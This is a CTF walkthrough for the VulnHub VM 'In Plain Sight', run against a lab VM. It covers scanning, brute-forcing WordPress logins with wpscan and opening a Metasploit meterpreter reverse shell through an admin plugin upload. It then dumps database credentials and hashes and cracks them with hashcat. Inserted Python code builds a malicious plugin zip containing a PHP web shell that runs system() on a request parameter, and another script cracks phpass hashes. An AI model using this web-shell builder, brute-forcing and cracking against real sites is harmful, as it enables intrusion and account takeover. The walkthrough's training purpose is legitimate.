VulnHub walkthrough: In Plain Sight 1.0.1

Name

Name: In Plain Sight: 1.0.1
Release date: 2 December 2019

Download

  • Download: https://drive.google.com/file/d/19BZkANMJDL421KkiHVePlzc3Oa3wwzHU/view?usp=sharing
  • Download (Mirror): https://download.vulnhub.com/inplainsight/inplainsight1.ova
  • Download (Torrent): https://download.vulnhub.com/inplainsight/inplainsight1.ova.torrent

Description

Level: beginner to intermediate
Notes: built and tested with VirtualBox. DHCP enabled. Root is required to read the flag.

  • Changelog: 2019-12-02: v1.0.1; 2019-11-22: v1.0

Information gathering

Start with nmap: a ping sweep of the host-only network to find the VM, then a full-port version scan of the host it turns up.

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.108
Host is up (0.00027s latency).
MAC Address: 08:00:27:48:A5:6E (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -p- -v -sV -Pn 192.168.56.108
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
root@kali:~# ftp 192.168.56.108
Connected to 192.168.56.108.
220 IPS Corp
Name (192.168.56.108:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 306 Nov 22 13:42 todo.txt
226 Directory send OK.
ftp> cat todo.txt
?Invalid command
ftp> get todo.txt
local: todo.txt remote: todo.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for todo.txt (306 bytes).
226 Transfer complete.
306 bytes received in 0.02 secs (14.9999 kB/s)
ftp> quit
221 Goodbye.
root@kali:~# cat todo.txt 
mike - please get ride of that worthless wordpress instance! it's a security ris
k. if you have privilege issues, please ask joe for assitance.

joe - stop leaving backdoors on the system or your access will be removed! y
our rabiit holes aren't enough for these elite cyber hacking types.

- boss person

Nothing directly usable, but the note is worth keeping: it names two users, mike and joe, calls the WordPress instance worthless, and complains that joe leaves backdoors and rabbit holes on the system. All of that matters later. Keep looking for sensitive information on the web server.

Note that the landing page is index.html. Open it and click anywhere.

An upload page appears.

The page accepts image uploads: uploading an image succeeds, but uploading a .php file returns an error. Looking around further, the page's URL stands out because it contains what looks like a hash. Copy it into a file (pass) and let john identify and crack it:

root@kali:~# john pass
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
goodluck (?)
1g 0:00:00:00 DONE 2/3 (2020-01-12 20:31) 20.00g/s 3680p/s 3680c/s 3680C/s emily..iceman
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

john cracks the hash: goodluck.
In other words, we have just been trolled (one of the rabbit holes the todo.txt warned about). Next, try uploading a simple .php file; the upload fails with an error.

The error, however, leads to a new page, upload.php. Check its source:

<!--ZmxvY2NpbmF1Y2luaWhpbGlwaWxpZmljYXRpb24K-->

The last line of the source is an HTML comment. It is base64, so decode it (the trailing newline in the output is part of the encoded string, which is why it ends in "K" rather than "=="):

root@kali:~# echo ZmxvY2NpbmF1Y2luaWhpbGlwaWxpZmljYXRpb24K | base64 -d
floccinaucinihilipilification

I don't know why the decoded string here differs from other walkthroughs; theirs is c28tZGV2LXdvcmRwcmVzcw==, which decodes to so-dev-wordpress.

The decoded text looks like a directory or page name. Before exploring it, check whether there are other pages; run dirb against the web root:

root@kali:~# dirb http://192.168.56.108/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Jan 12 20:42:40 2020
URL_BASE: http://192.168.56.108/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.108/ ----
+ http://192.168.56.108/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.108/info.php (CODE:200|SIZE:84111)
+ http://192.168.56.108/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.108/wordpress/

---- Entering directory: http://192.168.56.108/wordpress/ ----
+ http://192.168.56.108/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/
==> DIRECTORY: http://192.168.56.108/wordpress/wp-content/
==> DIRECTORY: http://192.168.56.108/wordpress/wp-includes/
+ http://192.168.56.108/wordpress/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.56.108/wordpress/wp-admin/ ----
+ http://192.168.56.108/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/includes/
+ http://192.168.56.108/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.56.108/wordpress/wp-admin/user/

---- Entering directory: http://192.168.56.108/wordpress/wp-content/ ----
+ http://192.168.56.108/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.108/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.56.108/wordpress/wp-content/themes/

---- Entering directory: http://192.168.56.108/wordpress/wp-admin/network/ ----
+ http://192.168.56.108/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.108/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.56.108/wordpress/wp-admin/user/ ----
+ http://192.168.56.108/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.108/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.56.108/wordpress/wp-content/plugins/ ----
+ http://192.168.56.108/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.56.108/wordpress/wp-content/themes/ ----
+ http://192.168.56.108/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

Plenty of pages, and the CMS is WordPress (the /wordpress/ tree). Run wpscan with enumeration against it, and later against the so-dev-wordpress path as well:

root@kali:~# wpscan --url http://192.168.56.108/wordpress/ --enumerate
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.7.6
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N][+] URL: http://192.168.56.108/wordpress/
[+] Started: Sun Jan 12 20:45:08 2020

Interesting Finding(s):

[+] http://192.168.56.108/wordpress/
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.56.108/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.56.108/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://192.168.56.108/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3 identified (Insecure, released on 2019-11-12).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.108/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.108/wordpress/, Match: 'WordPress 5.3'

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:00 <=======================> (320 / 320) 100.00% Time: 00:00:00

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:01 <=====================> (2568 / 2568) 100.00% Time: 00:00:01

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==========================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <==============================> (36 / 36) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:00 <===================> (100 / 100) 100.00% Time: 00:00:00

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] bossperson
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Sun Jan 12 20:45:16 2020
[+] Requests Done: 3094
[+] Cached Requests: 4
[+] Data Sent: 840.6 KB
[+] Data Received: 567.645 KB
[+] Memory used: 183.743 MB
[+] Elapsed time: 00:00:07

wpscan reports WordPress 5.3, a reachable xmlrpc.php and a single user, bossperson. Trying that username with a wordlist against the so-dev-wordpress instance gets nowhere (dirb's common.txt is a directory wordlist rather than a password list, so this is only a rough first pass):

root@kali:~# wpscan --url http://192.168.56.108/so-dev-wordpress/ -U bossperson -P /usr/share/wordlists/dirb/common.txt
[+] Performing password attack on Wp Login against 1 user/s
Trying bossperson / zoom Time: 00:00:27 <========================> (4614 / 4614) 100.00% Time: 00:00:27

[i] No Valid Passwords Found.

No valid password. Instead, enumerate the other instance, so-dev-wordpress, for its own users:

root@kali:~# wpscan --url http://192.168.56.108/so-dev-wordpress/ --enumerate
[i] User(s) Identified:

[+] mike
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

With two usernames, brute-force both against the same wordlist:

root@kali:~# wpscan --url http://192.168.56.108/so-dev-wordpress/ -U admin,mike -P /usr/share/wordlists/dirb/common.txt
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - admin / admin1
Trying mike / zope Time: 00:00:36 <==============================> (4914 / 4914) 100.00% Time: 00:00:36

[i] Valid Combinations Found:
| Username: admin, Password: admin1

Getting a shell

admin/admin1 works: we finally have the admin password. Now get a shell through msfconsole with exploit/unix/webapp/wp_admin_shell_upload. The module logs in as the WordPress administrator, installs a throwaway plugin whose PHP file is the payload, requests that file to execute it, and then deletes the plugin again. TARGETURI must point at /so-dev-wordpress, the instance whose credentials we hold.
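To make the "Uploading payload" and "Deleted ..." lines in the session log concrete, here is an added example (not part of the walkthrough and not Metasploit's code) that builds the kind of archive the module installs: a zip whose top-level directory holds a stub PHP file with a plugin header, which is what WordPress requires before it accepts an upload, plus a second PHP file carrying the payload. After installation both files are served directly from wp-content/plugins/<dir>/. The directory and file names are the random ones from the log; the command-runner PHP body and the parameter name cmd are assumptions, and nothing here talks to a server.

```python
"""Build the plugin archive that a WordPress admin-upload shell relies on.
Added example: it mirrors the Metasploit module's approach but is not its
code, and it never sends anything. Names come from the session log above;
the PHP bodies are assumed stand-ins for the real payload."""
import io
import zipfile


def plugin_stub(dir_name):
    """The file WordPress inspects: any PHP file with a 'Plugin Name:' header
    makes the zip a valid plugin, so the installer accepts it."""
    return f"<?php\n/*\nPlugin Name: {dir_name}\n*/\n"


def payload_php(param="cmd"):
    """Assumed command-runner payload: runs the value of the given request
    parameter. The real module drops a meterpreter stager here instead."""
    return (
        "<?php\n"
        f"if (isset($_REQUEST['{param}'])) {{\n"
        f"    system($_REQUEST['{param}']);\n"
        "}\n"
    )


def build_plugin_zip(dir_name, payload_name, param="cmd"):
    """Return the zip bytes: <dir>/<dir>.php (stub) and <dir>/<payload>.php."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{dir_name}/{dir_name}.php", plugin_stub(dir_name))
        zf.writestr(f"{dir_name}/{payload_name}.php", payload_php(param))
    return buf.getvalue()


def payload_url(targeturi, dir_name, payload_name):
    """Where the payload lands after install, matching the msf log line."""
    return f"{targeturi.rstrip('/')}/wp-content/plugins/{dir_name}/{payload_name}.php"


def zip_entries(zip_bytes):
    """List archive members so the layout can be checked before upload."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return sorted(zf.namelist())


if __name__ == "__main__":
    data = build_plugin_zip("RnhGIdzuxq", "oElblRDrKY")
    print(zip_entries(data))
    print(payload_url("/so-dev-wordpress", "RnhGIdzuxq", "oElblRDrKY"))
```

The three "Deleted" lines in the log correspond exactly to this layout: the payload file, the stub file, and finally the plugin directory itself.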

root@kali:~# msfdb run
[+] Starting database


Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!


=[ metasploit v5.0.68-dev ]
+ -- --=[ 1957 exploits - 1093 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set Pa
set PaSSWORD set PaYLOAD
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PA
set PASSWORD set PAYLOAD
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD admin1
PASSWORD => admin1
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.56.108
rhost => 192.168.56.108
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set TARGET
set TARGET set TARGETURI
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /so-dev-wordpress
TARGETURI => /so-dev-wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.56.102:4444
[*] Authenticating with WordPress using admin:admin1...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /so-dev-wordpress/wp-content/plugins/RnhGIdzuxq/oElblRDrKY.php...
[*] Sending stage (38288 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.108:60668) at 2020-01-12 22:03:59 -0500
[+] Deleted oElblRDrKY.php
[+] Deleted RnhGIdzuxq.php
[+] Deleted ../RnhGIdzuxq

meterpreter > id
[-] Unknown command: id.
meterpreter > sysinfo
Computer : inplainsight
OS : Linux inplainsight 5.3.0-23-generic #25-Ubuntu SMP Tue Nov 12 09:22:33 UTC 2019 x86_64
Meterpreter : php/linux

That gives a shell via msf. It is a PHP meterpreter, so commands such as id are unavailable inside it; drop to a system shell and upgrade it to a pty with python3:

meterpreter > shell
Process 1396 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/sh")'
sh: 0: getcwd() failed: No such file or directory
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
whoami
www-data

Exploration

$ ls
ls
$ pwd
pwd

$ pwd
pwd

$ cd ..
cd ..
$ ls
ls
akismet hello.php index.php
$ pwd
pwd
/var/www/html/so-dev-wordpress/wp-content/plugins
$

$ cd ../..
cd ../..
$ ls
ls
index.php wp-blog-header.php wp-cron.php wp-mail.php
license.txt wp-comments-post.php wp-includes wp-settings.php
readme.html wp-config-sample.php wp-links-opml.php wp-signup.php
wp-activate.php wp-config.php wp-load.php wp-trackback.php
wp-admin wp-content wp-login.php xmlrpc.php
$ pwd
pwd
/var/www/html/so-dev-wordpress
$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sodevwp' );

/** MySQL database username */
define( 'DB_USER', 'sodevwp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'oZ2R3c2x7dLL6#hJ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'b_P>20/J+HW!D1-[XI1~~abSjE~8do)Rp]jt/~Q0s-6/!U,Norv{.+1xOh5+gnPr' );
define( 'SECURE_AUTH_KEY', 'nbfna5q3cP5/Gfaa`H`4{SklZTx+inPmf*uh!boz=K`bUSldsl?m`-{0FZ9Kdw4$' );
define( 'LOGGED_IN_KEY', 'UC8f4{^Z[9co/>[n*opw @Dtss(?~[dBQ/Xtbm8&/rx1{=Y^obQY`DE7ZYmHwSQT' );
define( 'NONCE_KEY', 'Z)O2rZ_IT6fNshPKa^RB:2?EU%a|tV91z,mWU$rfsoFnbUVKp4l;+z lrN4~T(9h' );
define( 'AUTH_SALT', ']C-xQeq^*m$$yt:oLqg>b?+teMLO7~<#|j@(n/K~L!4 n{UCp%|$;;[_@6u]PHxT' );
define( 'SECURE_AUTH_SALT', '(rtGT9%Jv uX95E&!tdiTZ7X19u:ak_B_L@YOeRq6eLf.bWV{7|0Kn2JjOmk~[~l' );
define( 'LOGGED_IN_SALT', '1cC3onJs2/0; 5R91DS]m>i|-P1<SaQqUN3Lg`u|4{]aH826Fnt*,[RY?{y0JGeG' );
define( 'NONCE_SALT', '6a?qf^w0Q1D{%!Y_HIO&#Kc-p19/p8~#*Zo~6NHyZqSgL7ws6=Vdg|*Hijk<7T4{' );

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'sodevwp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );

Now we have the database name, user and password (passing the password with -p on the command line shows it in the process list, which only matters outside a lab):

/** The name of the database for WordPress */
define( 'DB_NAME', 'sodevwp' );

/** MySQL database username */
define( 'DB_USER', 'sodevwp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'oZ2R3c2x7dLL6#hJ' );
www-data@inplainsight:/var/www/html/so-dev-wordpress$ mysql -usodevwp -poZ2R3c2x7dLL6#hJ
<o-dev-wordpress$ mysql -usodevwp -poZ2R3c2x7dLL6#hJ
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 9805
Server version: 10.3.20-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| sodevwp |
+--------------------+
2 rows in set (0.000 sec)

MariaDB [(none)]> use sodevwp;
use sodevwp;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [sodevwp]> show tables;
show tables;
+----------------------------+
| Tables_in_sodevwp |
+----------------------------+
| sodevwp_commentmeta |
| sodevwp_comments |
| sodevwp_links |
| sodevwp_options |
| sodevwp_postmeta |
| sodevwp_posts |
| sodevwp_term_relationships |
| sodevwp_term_taxonomy |
| sodevwp_termmeta |
| sodevwp_terms |
| sodevwp_usermeta |
| sodevwp_users |
+----------------------------+
12 rows in set (0.000 sec)

MariaDB [sodevwp]> select * from sodevwp_users;
select * from sodevwp_users;
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA. | admin | admin@local.lan | | 2019-11-22 03:41:57 | | 0 | admin |
| 2 | mike | $P$B3halPOgh4jqI1tDelkv5TGAHnaOC01 | mike | mike@local.lan | | 2019-11-22 03:44:25 | | 0 | mike |
+----+------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.001 sec)

The query returns two phpass hashes ($P$ prefix, the WordPress portable format):

$P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA.(admin)
$P$B3halPOgh4jqI1tDelkv5TGAHnaOC01(mike)

Save the two hashes to a file and crack them with hashcat in mode 400 (phpass). On a GTX 1070 with 8 GB of memory the passwords fall in about a second, much faster than john on the CPU:

D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 400 password.txt D:/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

* Device #1: Intel's OpenCL runtime (GPU only) is currently broken.
We are waiting for updated OpenCL drivers from Intel.
You can use --force to override, but do not report related errors.
* Device #3: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlInit(): Unknown Error

OpenCL Platform #1: Intel(R) Corporation
========================================
* Device #1: Intel(R) UHD Graphics 630, skipped.
* Device #2: Intel(R) Core(TM) i7-8750H CPU @ 2.20GHz, skipped.

OpenCL Platform #2: NVIDIA Corporation
======================================
* Device #3: GeForce GTX 1070, 2048/8192 MB allocatable, 16MCU

Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache hit:
* Filename..: D:/wordlists/rockyou.txt
* Passwords.: 14344360
* Bytes.....: 139921318
* Keyspace..: 14344360

$P$B3halPOgh4jqI1tDelkv5TGAHnaOC01:skuxdelux
$P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA.:admin1

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: password.txt
Time.Started.....: Mon Jan 13 11:20:12 2020 (2 secs)
Time.Estimated...: Mon Jan 13 11:20:14 2020 (0 secs)
Guess.Base.......: File (D:/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#3.........: 1199.8 kH/s (6.61ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 2/2 (100.00%) Digests, 2/2 (100.00%) Salts
Progress.........: 1048576/28688720 (3.66%)
Rejected.........: 0/1048576 (0.00%)
Restore.Point....: 0/14344360 (0.00%)
Restore.Sub.#3...: Salt:1 Amplifier:0-1 Iteration:8064-8192
Candidates.#3....: 123456 -> chadj85
Hardware.Mon.#3..: N/A

Started: Mon Jan 13 11:20:09 2020
Stopped: Mon Jan 13 11:20:15 2020

Two passwords:
admin/admin1
mike/skuxdelux

Now switch user. admin is only a WordPress account, not a system user, so su admin fails; su mike with the cracked password succeeds, which confirms the password was reused for mike's system account.
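The dumped hashes can be verified, or cracked against a small list, without hashcat. The following is an added example, not from the walkthrough, that reimplements the phpass portable algorithm WordPress uses for $P$ hashes (the same thing hashcat mode 400 attacks): the fourth character selects 2^n rounds of MD5 over digest-plus-password, and the 16-byte result is encoded with phpass's own base64 alphabet. The two hashes are the ones from sodevwp_users; WORDLIST is a constructed stand-in for rockyou.txt.

```python
"""Verify or crack phpass portable hashes ($P$/$H$), the format WordPress
stores in wp_users.user_pass. Added example; not the walkthrough's code.
The two hashes are the ones dumped from sodevwp_users; WORDLIST is a
constructed stand-in for rockyou.txt."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw, count):
    """phpass's private base64: 6-bit groups taken little-endian from each
    3-byte chunk, no padding. Not interchangeable with RFC 4648."""
    out, i = [], 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password, setting):
    """Hash `password` under the 12-char setting prefix
    ($P$ + cost char + 8-char salt); returns the full 34-char hash."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("cost out of range")
    salt = setting[4:12].encode()
    if len(salt) != 8:
        raise ValueError("truncated salt")
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):  # cost 'B' = 13, so 8192 rounds for WordPress
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_check(password, stored):
    """Constant-format comparison of a candidate against a stored hash."""
    return phpass_crypt(password, stored) == stored


def crack(stored, candidates):
    """Return the first candidate that matches, or None."""
    for cand in candidates:
        if phpass_check(cand, stored):
            return cand
    return None


HASHES = {
    "admin": "$P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA.",
    "mike": "$P$B3halPOgh4jqI1tDelkv5TGAHnaOC01",
}
# Constructed wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "admin", "admin1", "skuxdelux"]

if __name__ == "__main__":
    for user, h in HASHES.items():
        print(user, crack(h, WORDLIST))
```

The cost character also explains the hashcat status line "Iteration:8064-8192": WordPress asks phpass for 2^8 rounds and phpass adds 5 to the exponent on PHP 5 and later, giving 2^13.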

www-data@inplainsight:/var/www/html/so-dev-wordpress$ su admin
su admin
su: user admin does not exist
www-data@inplainsight:/var/www/html/so-dev-wordpress$

www-data@inplainsight:/var/www/html/so-dev-wordpress$ su mike
su mike
Password: skuxdelux

mike@inplainsight:/var/www/html/so-dev-wordpress$ id
id
uid=1000(mike) gid=1000(mike) groups=1000(mike)
mike@inplainsight:/var/www/html/so-dev-wordpress$ whoami
whoami
mike

Privilege escalation

